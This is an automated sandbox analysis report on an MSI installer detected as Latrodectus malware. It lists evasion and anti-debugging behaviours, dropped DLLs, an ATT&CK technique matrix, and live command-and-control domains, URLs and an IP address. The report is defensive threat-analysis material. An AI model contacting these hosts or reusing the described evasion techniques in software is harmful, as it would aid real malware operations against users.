Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Source: C:\Windows\System32\rundll32.exe

Code function: EnterCriticalSection,memset,GetModuleFileNameW,PathAppendW,StrStrIW,PathFileExistsW,PathAppendW,PathFileExistsW,memset,SHGetValueW,PathAppendW,PathFileExistsW,LoadLibraryW,GetProcAddress,GetProcAddress,GetModuleFileNameW,PathAppendW,PathFileExistsW,PathAppendW,PathFileExistsW,memset,SHGetValueW,PathAppendW,PathFileExistsW,LoadLibraryW,GetProcAddress,GetProcAddress,LeaveCriticalSection,

6_2_00000001800655A8

Contains functionality to detect sleep reduction / modifications

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_0000000180049AEC

Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,	6_2_0000026387CF68E8
Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,	6_2_0000026387CF7FA8
Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,	7_2_000002095B8268E8
Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,	7_2_000002095B827FA8
Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,	8_2_000002268D6D68E8
Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,	8_2_000002268D6D7FA8

Source: C:\Windows\System32\rundll32.exe	Window / User API: threadDelayed 1004	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Window / User API: threadDelayed 815	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Window / User API: threadDelayed 8180	Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Dropped PE file which has not been started: :wtfbbq (copy)	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIB151.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIB1FF.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIB539.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIB25F.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIB22F.tmp	Jump to dropped file
Source: C:\Windows\System32\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Custom_update\Update_71a2ec86.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIB5A8.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIB1DF.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIB29F.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\sharepoint\360total.dll	Jump to dropped file

Source: C:\Windows\Installer\MSIB6D3.tmp

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_5-33387

Source: C:\Windows\System32\rundll32.exe	API coverage: 1.6 %
Source: C:\Windows\System32\rundll32.exe	API coverage: 8.4 %

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_0000000180049AEC

Source: C:\Windows\System32\rundll32.exe TID: 6556	Thread sleep count: 1004 > 30	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 6556	Thread sleep time: -1004000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 6636	Thread sleep count: 815 > 30	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 6636	Thread sleep time: -81500s >= -30000s	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 6556	Thread sleep count: 8180 > 30	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 6556	Thread sleep time: -8180000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Windows\Installer\MSIB6D3.tmp	Code function: 5_2_00B6AF79 FindFirstFileExW,	5_2_00B6AF79
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000026387CFA350 FindFirstFileW,FindNextFileW,LoadLibraryW,	6_2_0000026387CFA350
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000026387CF1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	6_2_0000026387CF1A08
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000002095B82A350 FindFirstFileW,FindNextFileW,LoadLibraryW,	7_2_000002095B82A350
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000002095B821A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	7_2_000002095B821A08
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000002268D6DA350 FindFirstFileW,FindNextFileW,LoadLibraryW,	8_2_000002268D6DA350
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000002268D6D1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	8_2_000002268D6D1A08

Source: rundll32.exe, 00000007.00000002.3348585444.0000020959E88000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MWrod_VMware_SATA_CD00#4&224f42ef&
Source: rundll32.exe, 00000007.00000002.3348585444.0000020959E88000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: rundll32.exe, 00000007.00000002.3348585444.0000020959F22000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3230609342.0000020959F22000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000007.00000003.3230609342.0000020959EEF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3348585444.0000020959EE8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWC

Source: C:\Windows\System32\rundll32.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\rundll32.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\rundll32.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\Installer\MSIB6D3.tmp

Code function: 5_2_00B3D0A5 IsDebuggerPresent,OutputDebugStringW,

5_2_00B3D0A5

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_0000000180066C3C memset,GetLastError,IsDebuggerPresent,OutputDebugStringW,

6_2_0000000180066C3C

Source: C:\Windows\System32\rundll32.exe

6_2_00000001800033E0

Source: C:\Windows\Installer\MSIB6D3.tmp	Code function: 5_2_00B62DCC mov ecx, dword ptr fs:[00000030h]		5_2_00B62DCC
Source: C:\Windows\Installer\MSIB6D3.tmp	Code function: 5_2_00B6AD78 mov eax, dword ptr fs:[00000030h]		5_2_00B6AD78

Source: C:\Windows\Installer\MSIB6D3.tmp

Code function: 5_2_00B32310 GetProcessHeap,

5_2_00B32310

Source: C:\Windows\Installer\MSIB6D3.tmp	Code function: 5_2_00B533A8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00B533A8
Source: C:\Windows\Installer\MSIB6D3.tmp	Code function: 5_2_00B5353F SetUnhandledExceptionFilter,	5_2_00B5353F
Source: C:\Windows\Installer\MSIB6D3.tmp	Code function: 5_2_00B52968 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00B52968
Source: C:\Windows\Installer\MSIB6D3.tmp	Code function: 5_2_00B56E1B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00B56E1B
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180070760 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_0000000180070760
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018006F6E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_000000018006F6E0

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\rundll32.exe

Network Connect: 104.21.46.75 443

Yara detected Latrodectus

Source: C:\Windows\Installer\MSIB6D3.tmp

Code function: 5_2_00B352F0 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,Sleep,Sleep,EnumWindows,BringWindowToTop,WaitForSingleObject,GetExitCodeProcess,

5_2_00B352F0

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_000000018004A650 memset,GetModuleFileNameW,PathAppendW,ShellExecuteExW,ILGetSize,GetTickCount,srand,GetCurrentProcess,GetProcessId,GetCurrentThreadId,rand,LocalAlloc,InitializeSecurityDescriptor,LocalFree,SetSecurityDescriptorDacl,CreateFileMappingW,LocalFree,CreateFileMappingW,MapViewOfFile,CloseHandle,memset,memmove,memmove,memmove,memmove,memmove,UnmapViewOfFile,FindWindowW,SetForegroundWindow,memset,wsprintfW,memset,WaitForSingleObject,Sleep,CloseHandle,CloseHandle,CloseHandle,

6_2_000000018004A650

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_0000000180049278 LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,??_U@YAPEAX_K@Z,GetCurrentProcess,OpenProcessToken,CreateRestrictedToken,CloseHandle,CloseHandle,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,AdjustTokenPrivileges,??_V@YAXPEAX@Z,

6_2_0000000180049278

Source: 360total.dll.2.dr	Binary or memory string: Program managerProgmanSeShutdownPrivilegeSeTimeZonePrivilegeSeIncreaseWorkingSetPrivilegeSeUndockPrivilegeSeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeEnableLUASoftware\Microsoft\Windows\CurrentVersion\Policies\Systemseclogonwdc.dllWdcRunTaskAsInteractiveUser"%s" %swinsta0\defaultadvapi32.dllCreateProcessWithTokenW:open..\360DeskAna64.exe%u_%d_%d_%d_%use2/%s %s %use1SeTcbPrivilegeNT AUTHORITYLOCAL SERVICENETWORK SERVICE360utilexplorer.exe,
Source: rundll32.exe	Binary or memory string: Progman
Source: rundll32.exe	Binary or memory string: Program manager

Source: C:\Windows\Installer\MSIB6D3.tmp

Code function: 5_2_00B535A9 cpuid

5_2_00B535A9

Source: C:\Windows\Installer\MSIB6D3.tmp	Code function: EnumSystemLocalesW,	5_2_00B6E0C6
Source: C:\Windows\Installer\MSIB6D3.tmp	Code function: EnumSystemLocalesW,	5_2_00B6E1AC
Source: C:\Windows\Installer\MSIB6D3.tmp	Code function: EnumSystemLocalesW,	5_2_00B67132
Source: C:\Windows\Installer\MSIB6D3.tmp	Code function: EnumSystemLocalesW,	5_2_00B6E111
Source: C:\Windows\Installer\MSIB6D3.tmp	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	5_2_00B6E237
Source: C:\Windows\Installer\MSIB6D3.tmp	Code function: GetLocaleInfoEx,	5_2_00B523F8
Source: C:\Windows\Installer\MSIB6D3.tmp	Code function: GetLocaleInfoW,	5_2_00B6E48A
Source: C:\Windows\Installer\MSIB6D3.tmp	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	5_2_00B6E5B3
Source: C:\Windows\Installer\MSIB6D3.tmp	Code function: GetLocaleInfoW,	5_2_00B6E6B9
Source: C:\Windows\Installer\MSIB6D3.tmp	Code function: GetLocaleInfoW,	5_2_00B676AF
Source: C:\Windows\Installer\MSIB6D3.tmp	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	5_2_00B6E788
Source: C:\Windows\Installer\MSIB6D3.tmp	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	5_2_00B6DE24

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\Installer\MSIB6D3.tmp

Code function: 5_2_00B537D5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

5_2_00B537D5

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_0000026387CF8AE0 GetUserNameA,wsprintfA,

6_2_0000026387CF8AE0

Source: C:\Windows\Installer\MSIB6D3.tmp

Code function: 5_2_00B67B1F GetTimeZoneInformation,

5_2_00B67B1F

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_0000000180040CB0 GetVersionExW,memset,SHGetValueW,atoi,GetVersion,GetModuleHandleW,GetProcAddress,

6_2_0000000180040CB0

Source: rundll32.exe	Binary or memory string: 360tray.exe
Source: rundll32.exe	Binary or memory string: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
Source: rundll32.exe	Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe

Stealing of Sensitive Information

Source: Yara match	File source: 6.2.rundll32.exe.26387cf0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.2095b810000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.26387ce0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.26387ce0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.2268d6d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.2095b820000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.2095b820000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.2095b810000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.2268d6d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.2268d6c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.2268d6c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.26387cf0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000003.3230953855.000002095BA10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2135345986.000002268D6C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2135365322.000002268D6D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2974432949.000002095BA10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3348940328.000002095B810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3349009831.000002095BA10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3348957722.000002095B820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.3287402342.000002095BA10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.3130529388.000002095BDE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3348028990.000000E23987A000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2113131628.0000026387CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2224, type: MEMORYSTR

Remote Access Functionality

Yara detected Latrodectus

Source: Yara match	File source: 6.2.rundll32.exe.26387cf0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.2095b810000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.26387ce0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.26387ce0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.2268d6d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.2095b820000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.2095b820000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.2095b810000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.2268d6d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.2268d6c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.2268d6c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.26387cf0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000003.3230953855.000002095BA10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2135345986.000002268D6C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2135365322.000002268D6D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2974432949.000002095BA10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3348940328.000002095B810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3349009831.000002095BA10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3348957722.000002095B820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.3287402342.000002095BA10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.3130529388.000002095BDE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3348028990.000000E23987A000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2113131628.0000026387CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2224, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Deobfuscate/Decode Files or Information	OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	1 Replication Through Removable Media	1 Scheduled Task/Job	1 Valid Accounts	1 DLL Side-Loading	2 Obfuscated Files or Information	LSASS Memory	11 Peripheral Device Discovery	Remote Desktop Protocol	Data from Removable Media	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Service Execution	1 Windows Service	1 Valid Accounts	1 DLL Side-Loading	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Scheduled Task/Job	11 Access Token Manipulation	1 File Deletion	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Windows Service	121 Masquerading	LSA Secrets	34 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	12 Process Injection	1 Valid Accounts	Cached Domain Credentials	251 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Scheduled Task/Job	1 Virtualization/Sandbox Evasion	DCSync	1 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Access Token Manipulation	Proc Filesystem	3 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Rundll32	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	1 System Network Configuration Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
ad.msi	8%	ReversingLabs

Dropped Files

Source	Detection	Scanner
:wtfbbq (copy)	8%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIB151.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIB1DF.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIB1FF.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIB22F.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIB25F.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIB29F.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\sharepoint\360total.dll	8%	ReversingLabs
C:\Users\user\AppData\Roaming\Custom_update\Update_71a2ec86.dll	8%	ReversingLabs
C:\Windows\Installer\MSIB539.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIB5A8.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIB6D3.tmp	0%	ReversingLabs

Source	Detection	Scanner	Label
https://jarinamaers.shop/live/r	0%	Avira URL Cloud	safe
https://jarinamaers.shop/live/5	0%	Avira URL Cloud	safe
https://wrankaget.site/live/	0%	Avira URL Cloud	safe
ftp://ftp%2desktop.ini	0%	Avira URL Cloud	safe
https://jarinamaers.shop/x	0%	Avira URL Cloud	safe
https://jarinamaers.shop/rRb&u	0%	Avira URL Cloud	safe
https://jarinamaers.shop/fb	0%	Avira URL Cloud	safe
https://jarinamaers.shop/.b	0%	Avira URL Cloud	safe
https://jarinamaers.shop/live/IP	0%	Avira URL Cloud	safe
https://jarinamaers.shop/live/RYPT32.dll.mui3N	0%	Avira URL Cloud	safe
https://jarinamaers.shop/live/zTEum	0%	Avira URL Cloud	safe
https://jarinamaers.shop/d	0%	Avira URL Cloud	safe
https://jarinamaers.shop/live/ace	0%	Avira URL Cloud	safe
https://jarinamaers.shop/live/06	0%	Avira URL Cloud	safe
https://jarinamaers.shop/live/I	0%	Avira URL Cloud	safe
https://jarinamaers.shop/	0%	Avira URL Cloud	safe
https://jarinamaers.shop/live/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
jarinamaers.shop	104.21.46.75	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://wrankaget.site/live/	true	Avira URL Cloud: safe	unknown
https://jarinamaers.shop/live/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://jarinamaers.shop/live/IP	rundll32.exe, 00000007.00000003.3230577585.0000020959F34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3348585444.0000020959F2E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jarinamaers.shop/live/5	rundll32.exe, 00000007.00000002.3348585444.0000020959E88000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jarinamaers.shop/.b	rundll32.exe, 00000007.00000002.3348585444.0000020959F2E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jarinamaers.shop/live/r	rundll32.exe, 00000007.00000002.3348585444.0000020959E88000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pconf.f.360.cn/safe_update.php	rundll32.exe	false		high
https://jarinamaers.shop/x	rundll32.exe, 00000007.00000003.3230609342.0000020959EEF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3348585444.0000020959EE8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
ftp://ftp%2desktop.ini	rundll32.exe, 00000006.00000003.2111415783.0000026387FC0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000007.00000002.3347746498.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_71a2ec86.dll.6.dr, 360total.dll.2.dr	false	Avira URL Cloud: safe	low
https://jarinamaers.shop/fb	rundll32.exe, 00000007.00000003.3230577585.0000020959F34000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jarinamaers.shop/rRb&u	rundll32.exe, 00000007.00000002.3348585444.0000020959F2E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jarinamaers.shop/live/RYPT32.dll.mui3N	rundll32.exe, 00000007.00000002.3348585444.0000020959F2E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
